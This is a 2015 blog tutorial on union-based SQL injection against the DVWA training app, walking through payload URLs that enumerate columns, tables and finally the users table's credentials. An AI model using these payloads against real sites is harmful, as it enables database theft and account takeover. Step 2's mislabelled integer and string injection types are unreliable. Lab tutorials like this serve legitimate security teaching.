Saturday, 25 July 2015

Union Based SQL Injection on DVWA | Rahul Tyagi

Advanced SQL Injection on DVWA
Union-based injection is the class of injection we turn to after authentication bypass. When you cannot hack a website through the front end (in other words, the admin login page), you attack the website's database instead, in such a way that you reach the usernames and passwords of the website. Those usernames and passwords can later be used to log in.
Database --> Tables --> Columns --> Data
Step 1: Find a GET method in any URL of the website.
http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#
GET Method: .php?id=10 | Length is dynamic
POST Method: .php | Fixed length
Step 2: Check the exception handling
http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#
Integer Type Injection: id=1'
String Based Injection: id=1
Step 3: Count the total number of columns in the table behind this URL.
http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=1' order by 1--+&Submit=Submit#
Step 4: Check which of these two columns is vulnerable, i.e. where we can add our query.
http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=1' union select 1,2--+&Submit=Submit#
Schema: the mother of the database (:P)
It is responsible for holding the structure of the data, along with an index of the names of all the tables and columns.
Tables: information_schema.tables--
Columns: information_schema.columns--
Step 5: Check the version of the database along with database name.
http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=1' union select database(),version()--+&Submit=Submit#
Step 6: Get the table name from the database
http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=1' union select 1,table_name from information_schema.tables--+&Submit=Submit#
Target Table : users
Step 7: Get the columns from table name users
http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=1' union select 1,column_name from information_schema.columns where table_name='users'--+&Submit=Submit#
Extracted Columns: user and password
Step 8: Get the data from user and password.
http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=1' union select user,password from users--+&Submit=Submit#
Extracted user=admin and password=password
